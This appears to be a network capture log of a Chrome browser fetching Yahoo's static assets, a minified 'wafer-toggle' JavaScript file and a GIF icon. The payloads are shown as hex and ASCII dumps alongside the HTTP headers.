                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:00 UTC1300INData Raw: 56 3d 6a 28 76 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 22 63 61 61 73 2d 62 6f 64 79 2d 77 72 61 70 70 65 72 22 29 29 5b 30 5d 3b 56 26 26 56 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 63 61 61 73 2d 62 6f 64 79 2d 63 6f 6c 6c 61 70 73 65 64 22 29 7d 69 66 28 6f 26 26 6f 2e 63 61 6c 6c 28 65 2c 6e 2c 72 29 2c 6e 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 77 61 66 65 72 2d 63 61 61 73 2d 74 72 69 67 67 65 72 2d 69 6e 70 72 6f 67 72 65 73 73 22 29 2c 6e 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 73 29 2c 53 2e 65 6d 69 74 4c 6f 67 28 7b 6e 61 6d 65 3a 22 57 61 66 65 72 43 61 61 73 22 2c 65 6c 65 6d 3a 6e 2c 6d 65 74 61 3a 7b 64 75 72 61 74 69 6f 6e 3a 6c 2c 73 6f 75 72 63 65 3a 67 3f 22 4d 45 4d 4f 52 59
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: V=j(v.getElementsByClassName("caas-body-wrapper"))[0];V&&V.classList.add("caas-body-collapsed")}if(o&&o.call(e,n,r),n.classList.remove("wafer-caas-trigger-inprogress"),n.classList.add(s),S.emitLog({name:"WaferCaas",elem:n,meta:{duration:l,source:g?"MEMORY
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:00 UTC1300INData Raw: 70 73 65 64 22 5d 29 7b 76 61 72 20 6e 3d 6a 28 73 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 22 63 61 61 73 2d 62 6f 64 79 2d 77 72 61 70 70 65 72 22 29 29 5b 30 5d 3b 6e 26 26 6e 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 63 61 61 73 2d 62 6f 64 79 2d 63 6f 6c 6c 61 70 73 65 64 22 29 7d 72 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 69 29 2c 53 2e 65 6d 69 74 4c 6f 67 28 7b 6e 61 6d 65 3a 22 57 61 66 65 72 43 61 61 73 22 2c 65 6c 65 6d 3a 72 2c 6d 65 74 61 3a 7b 7d 7d 29 7d 7d 2c 7b 6b 65 79 3a 22 68 61 6e 64 6c 65 53 70 61 63 69 6e 67 41 6e 64 47 65 74 4f 66 66 73 65 74 41 62 6f 76 65 52 69 67 68 74 52 61 69 6c 41 64 73 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 5f 75
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: psed"]){var n=j(s.getElementsByClassName("caas-body-wrapper"))[0];n&&n.classList.add("caas-body-collapsed")}r.classList.add(i),S.emitLog({name:"WaferCaas",elem:r,meta:{}})}},{key:"handleSpacingAndGetOffsetAboveRightRailAds",value:function(e){var t=this._u


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    83192.168.2.44984887.248.119.2524434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:00 UTC540OUTGET /aaq/wf/wf-toggle-1.15.4-modern.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:00 UTC743INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-id-2: VlifkYD0ScbwT2wbztInI13H2cRqmK7+1m467QZE787thXjccKJybkWPc06hTmo0tflPLXJefU0=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-request-id: A6464TKMJQY37222
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Mon, 30 Sep 2024 05:25:22 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Last-Modified: Wed, 20 Apr 2022 09:12:23 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ETag: "9ec69a2055c595f415eade096a476b0d"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-version-id: HE26GDjTNsmXBUPJeKnrarkIBLKe8tee
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 12433
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 42940
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:00 UTC1300INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 77 61 66 65 72 2d 74 6f 67 67 6c 65 22 2c 5b 5d 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 5b 22 77 61 66 65 72 2d 74 6f 67 67 6c 65 22 5d 3d 74 28 29 3a 28 65 2e 77 61 66 65 72 3d 65 2e 77 61 66 65 72 7c 7c 7b 7d 2c 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 3d 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 7c 7c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: !function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-toggle",[],t):"object"==typeof exports?exports["wafer-toggle"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:00 UTC1300INData Raw: 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 74 26 26 74 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 3a 65 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 31 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 74 26 26 28 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 65 2c 74 29 3a 65 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 74 29 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 2c 74 29 7b 69 66 28 21 28 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 74 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 63 61 6c 6c 20 61 20 63 6c 61 73 73 20 61 73 20
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: prototype=Object.create(t&&t.prototype,{constructor:{value:e,enumerable:!1,writable:!0,configurable:!0}}),t&&(Object.setPrototypeOf?Object.setPrototypeOf(e,t):e.__proto__=t)}function a(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:00 UTC1300INData Raw: 73 5b 74 5d 3b 66 6f 72 28 76 61 72 20 6e 20 69 6e 20 72 29 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 72 2c 6e 29 26 26 28 65 5b 6e 5d 3d 72 5b 6e 5d 29 7d 72 65 74 75 72 6e 20 65 7d 2c 66 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 74 2e 6c 65 6e 67 74 68 3b 72 2b 2b 29 7b 76 61 72 20 6e 3d 74 5b 72 5d 3b 6e 2e 65 6e 75 6d 65 72 61 62 6c 65 3d 6e 2e 65 6e 75 6d 65 72 61 62 6c 65 7c 7c 21 31 2c 6e 2e 63 6f 6e 66 69 67 75 72 61 62 6c 65 3d 21 30 2c 22 76 61 6c 75 65 22 69 6e 20 6e 26 26 28 6e 2e 77 72 69 74 61 62 6c 65 3d 21 30 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 6e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: s[t];for(var n in r)Object.prototype.hasOwnProperty.call(r,n)&&(e[n]=r[n])}return e},f=function(){function e(e,t){for(var r=0;r<t.length;r++){var n=t[r];n.enumerable=n.enumerable||!1,n.configurable=!0,"value"in n&&(n.writable=!0),Object.defineProperty(e,n
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:00 UTC1300INData Raw: 28 6b 2b 22 74 6f 67 67 6c 65 2d 63 6c 61 73 73 22 29 7c 7c 22 22 2c 75 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 6b 2b 22 74 6f 67 67 6c 65 2d 70 72 65 76 65 6e 74 2d 62 72 6f 77 73 65 72 2d 64 65 66 61 75 6c 74 2d 62 65 68 61 76 69 6f 72 22 29 2c 6c 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 6b 2b 22 74 6f 67 67 6c 65 2d 70 72 65 76 65 6e 74 2d 73 63 72 6f 6c 6c 22 29 2c 66 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 6b 2b 22 73 79 6e 63 2d 64 65 6c 61 79 22 29 2c 64 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 6b 2b 22 74 6f 67 67 6c 65 2d 74 61 72 67 65 74 22 29 2c 76 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 6b 2b 22 74 6f 67 67 6c 65 2d 62 6f 75 6e 64 61 72 79 22 29 2c 68 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 6b 2b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: (k+"toggle-class")||"",u=e.getAttribute(k+"toggle-prevent-browser-default-behavior"),l=e.getAttribute(k+"toggle-prevent-scroll"),f=e.getAttribute(k+"sync-delay"),d=e.getAttribute(k+"toggle-target"),v=e.getAttribute(k+"toggle-boundary"),h=e.getAttribute(k+
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:00 UTC1300INData Raw: 26 72 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 61 72 69 61 2d 63 6f 6e 74 72 6f 6c 73 22 2c 6f 29 7d 7d 2c 7b 6b 65 79 3a 22 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 73 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 5f 75 74 69 6c 2c 74 3d 65 2e 65 6c 65 6d 2c 72 3d 65 2e 65 76 65 6e 74 73 3b 69 66 28 30 21 3d 3d 72 2e 73 69 7a 65 29 7b 76 61 72 20 6e 3d 21 30 2c 6f 3d 21 31 2c 69 3d 76 6f 69 64 20 30 3b 74 72 79 7b 66 6f 72 28 76 61 72 20 61 2c 73 3d 72 2e 6b 65 79 73 28 29 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 28 29 3b 21 28 6e 3d 28 61 3d 73 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 29 3b 6e 3d 21 30 29 7b 76 61 72 20 75 3d 61 2e 76 61 6c 75 65 2c 6c 3d 74 68 69 73 2e 5f 73 74 61 74 65 2e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: &r.setAttribute("aria-controls",o)}},{key:"addEventListeners",value:function(){var e=this._util,t=e.elem,r=e.events;if(0!==r.size){var n=!0,o=!1,i=void 0;try{for(var a,s=r.keys()[Symbol.iterator]();!(n=(a=s.next()).done);n=!0){var u=a.value,l=this._state.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:00 UTC1300INData Raw: 6e 4c 6f 61 64 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 70 72 6f 63 65 73 73 54 61 72 67 65 74 73 28 22 6f 6e 4c 6f 61 64 22 29 7d 7d 2c 7b 6b 65 79 3a 22 6d 6f 75 73 65 65 6e 74 65 72 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 70 72 6f 63 65 73 73 54 61 72 67 65 74 73 28 22 6d 6f 75 73 65 65 6e 74 65 72 22 29 7d 7d 2c 7b 6b 65 79 3a 22 6d 6f 75 73 65 45 6e 74 65 72 44 65 6c 61 79 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 74 68 69 73 2e 5f 73 74 61 74 65 2e 63 6c 69 63 6b 41 6e 64 4d 6f 75 73 65 45 78 69 74 54 69 6d 65 6f 75 74 29 7d 7d 2c 7b 6b 65 79 3a 22 6d 6f 75 73 65 6c 65 61 76 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: nLoad",value:function(){this.processTargets("onLoad")}},{key:"mouseenter",value:function(){this.processTargets("mouseenter")}},{key:"mouseEnterDelay",value:function(){clearTimeout(this._state.clickAndMouseExitTimeout)}},{key:"mouseleave",value:function(){
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:00 UTC1300INData Raw: 74 68 69 73 2e 73 77 69 70 65 72 69 67 68 74 28 29 7d 7d 2c 7b 6b 65 79 3a 22 73 77 69 70 65 6c 65 66 74 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 70 72 6f 63 65 73 73 54 61 72 67 65 74 73 28 22 73 77 69 70 65 6c 65 66 74 22 29 7d 7d 2c 7b 6b 65 79 3a 22 73 77 69 70 65 72 69 67 68 74 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 70 72 6f 63 65 73 73 54 61 72 67 65 74 73 28 22 73 77 69 70 65 72 69 67 68 74 22 29 7d 7d 2c 7b 6b 65 79 3a 22 63 6c 65 61 72 44 72 61 67 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 75 74 69 6c 2e 64 72 61 67 3d 7b 65 6e 64 58 3a 30 2c 65 6e 64 59 3a 30 2c 6f 76 65 72 61 6c 6c 44 69 72 65 63 74 69 6f 6e 58 3a 30 2c 73 74 61 72 74 58 3a 30 2c 73
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: this.swiperight()}},{key:"swipeleft",value:function(){this.processTargets("swipeleft")}},{key:"swiperight",value:function(){this.processTargets("swiperight")}},{key:"clearDrag",value:function(){this._util.drag={endX:0,endY:0,overallDirectionX:0,startX:0,s
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:00 UTC1300INData Raw: 68 69 73 2e 67 65 74 54 61 72 67 65 74 73 28 66 2c 61 29 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 72 29 7b 76 61 72 20 6e 3d 74 2e 5f 75 74 69 6c 2e 66 6f 63 75 73 54 61 72 67 65 74 7c 7c 42 6f 6f 6c 65 61 6e 28 63 26 26 75 29 3f 72 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 75 29 7c 7c 72 3a 72 3b 74 2e 5f 75 74 69 6c 2e 66 6f 63 75 73 54 61 72 67 65 74 3d 74 2e 5f 75 74 69 6c 2e 66 6f 63 75 73 54 61 72 67 65 74 7c 7c 6e 2c 64 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 6f 3d 6c 28 6e 2c 32 29 2c 69 3d 6f 5b 30 5d 2c 75 3d 6f 5b 31 5d 2c 63 3d 72 2e 63 6c 61 73 73 4c 69 73 74 2c 66 3d 69 2e 72 65 70 6c 61 63 65 28 22 57 69 74 68 53 79 6e 63 55 49 44 65 6c 61 79 22 2c 22 22 29 2e 72 65 70 6c 61 63 65 28 22 57
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: his.getTargets(f,a).forEach(function(r){var n=t._util.focusTarget||Boolean(c&&u)?r.querySelector(u)||r:r;t._util.focusTarget=t._util.focusTarget||n,d.forEach(function(n){var o=l(n,2),i=o[0],u=o[1],c=r.classList,f=i.replace("WithSyncUIDelay","").replace("W
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:00 UTC1300INData Raw: 28 22 73 74 61 74 65 43 68 61 6e 67 65 22 29 26 26 28 22 31 22 3d 3d 3d 74 68 69 73 2e 5f 75 74 69 6c 2e 6b 65 79 3f 72 2e 67 65 74 28 22 73 74 61 74 65 43 68 61 6e 67 65 22 29 5b 30 5d 5b 30 5d 3d 22 61 64 64 22 3a 72 2e 67 65 74 28 22 73 74 61 74 65 43 68 61 6e 67 65 22 29 5b 30 5d 5b 30 5d 3d 22 72 65 6d 6f 76 65 22 2c 74 68 69 73 2e 70 72 6f 63 65 73 73 54 61 72 67 65 74 73 28 22 73 74 61 74 65 43 68 61 6e 67 65 22 29 29 7d 7d 2c 7b 6b 65 79 3a 22 64 65 73 74 72 6f 79 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 73 28 29 2c 64 28 74 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 5f 70 72 6f 74 6f 5f 5f 7c 7c 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 74 2e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ("stateChange")&&("1"===this._util.key?r.get("stateChange")[0][0]="add":r.get("stateChange")[0][0]="remove",this.processTargets("stateChange"))}},{key:"destroy",value:function(){this.removeEventListeners(),d(t.prototype.__proto__||Object.getPrototypeOf(t.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:00 UTC733INData Raw: 75 29 7d 29 2c 75 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 73 28 29 2c 75 7d 72 65 74 75 72 6e 20 75 28 74 2c 65 29 2c 53 28 74 2c 5b 7b 6b 65 79 3a 22 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 73 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 50 28 64 6f 63 75 6d 65 6e 74 2c 22 6b 65 79 64 6f 77 6e 22 2c 74 68 69 73 2e 5f 68 61 6e 64 6c 65 4b 65 79 44 6f 77 6e 29 7d 7d 2c 7b 6b 65 79 3a 22 5f 68 61 6e 64 6c 65 4b 65 79 44 6f 77 6e 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 73 77 69 74 63 68 28 65 3d 65 7c 7c 77 69 6e 64 6f 77 2e 65 76 65 6e 74 2c 65 2e 6b 65 79 43 6f 64 65 29 7b 63 61 73 65 20 32 37 3a 76 61 72 20 74 3d 74 68 69 73 2e 5f 73 74 61 74 65 2e 65 6c 65 6d 65 6e 74 49 6e 73 74 61 6e 63 65 73 2c 72 3d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: u)}),u.addEventListeners(),u}return u(t,e),S(t,[{key:"addEventListeners",value:function(){P(document,"keydown",this._handleKeyDown)}},{key:"_handleKeyDown",value:function(e){switch(e=e||window.event,e.keyCode){case 27:var t=this._state.elementInstances,r=


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    84192.168.2.44984787.248.119.2524434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:00 UTC381OUTGET /pv/static/img/icon-flame-light-202303010352.gif HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:00 UTC656INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-id-2: dQvEIG9XfV/NzfL4jOpwXAWrvIAo1fuJCI75EPhUo2GPC05fIxViQg+IiUuJNzjpjfEhL7SqFno=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-request-id: 5PTSKMDCGF95R7PP
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Mon, 29 Jul 2024 23:16:28 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Last-Modified: Wed, 01 Mar 2023 03:52:06 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ETag: "2fb9d43c74752389405abc1a5814b44a"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: max-age=31536000, public
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Expires: Tue, 01 Mar 2033 03:52:18 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: image/gif
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 539840
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 5421873
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:00 UTC1300INData Raw: 47 49 46 38 39 61 04 01 54 01 f7 01 00 ff ff ff fd fd ff fd ff ff ff f9 ff ff fa f4 ff fb ee ff fb ff ff fd fd ff fe f6 ff fe ff ff ff fa ff ff fe ff f3 ea ff f4 f5 ff fa fa ff fb fb f7 e5 e2 f8 fe ff fe e4 d1 ff e8 d1 ff f6 d8 ff fa e6 f4 55 2e f5 52 1a fb 51 10 fc 4f 0b fc d6 c2 fc e8 c5 fe 4b 0a fe 4d 08 fe 4e 0b fe 4e 13 fe 4f 0d fe 50 0c fe 51 0d fe 51 0f fe 53 16 fe 55 15 ff 4e 0d ff ef d2 ff b8 8c ff c3 a9 ff e4 c4 ff fe e8 d8 5e 3c e6 6d 43 fc 4e 12 fd 4f 0f fe 4c 22 fe 51 18 fe 53 13 fe 5b 18 ff 4d 15 ff f3 d5 c5 80 64 d3 64 3f dc a0 8d fe 70 41 bc 69 4d fe 68 2f d1 86 69 e4 cf b4 e0 bf b5 ff ad 95 fb 84 66 fe ea d3 fe fd ff fe ff fd ff e0 d0 ff f8 ee ff fb f8 ff fe fc ff ff fc fb ff fb fb ff ff ff ea e2 ff ef d9 ff f7 f6 ff fd f7 ff fd fa f7 df
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: GIF89aTU.RQOKMNNOPQQSUN^<mCNOL"QS[Mdd?pAiMh/if
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:00 UTC1300INData Raw: 07 ff 80 00 82 83 84 85 86 87 88 86 47 47 82 09 09 89 90 91 92 93 94 95 8d 5c 01 98 8f 96 9c 9d 9e 93 06 0f 46 5f 4d a5 a1 11 8e a9 a9 9f ac ad 91 a7 a4 a6 a8 aa aa ae b6 b7 97 a4 4b 10 0e 03 4a bf b4 8e b8 c3 ac 0b 48 04 0c 10 bc be c0 c1 c4 cf 9c 0a 48 ca bb 4b 0d 98 b9 ab d0 db af 4e 58 d4 d4 51 8c 00 ce dc e6 b5 e4 0e 5e 56 d4 12 ca d7 d2 02 02 e6 f4 83 e8 c6 ec ca ee 50 bb f0 f2 f5 f5 82 35 c8 b7 af 20 03 2c 08 87 28 3c 06 10 9a 40 30 ed 24 10 69 27 25 e1 42 24 0d 9f 05 6b 07 61 a2 c7 70 e2 e2 61 cc 38 ec 91 2a 8e 1f 3f fa 8b 47 b2 e4 b1 27 eb aa f1 4b 49 51 d4 28 2e 2d 71 bd 1c 88 b2 a0 ca 95 38 73 76 12 96 4e 5a 11 82 3d 69 1e 8c 95 50 a8 25 a2 3b f3 f5 ec e8 f3 9d ac 45 4e 2b c1 32 8a 14 25 55 a5 eb bc c1 dc 79 51 9e d9 79 4e b7 22 28 d0 75 e6 57
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: GG\F_MKJHHKNXQ^VP5 ,(<@0$i'%B$kapa8*?G'KIQ(.-q8svNZ=iP%;EN+2%UyQyN"(uW
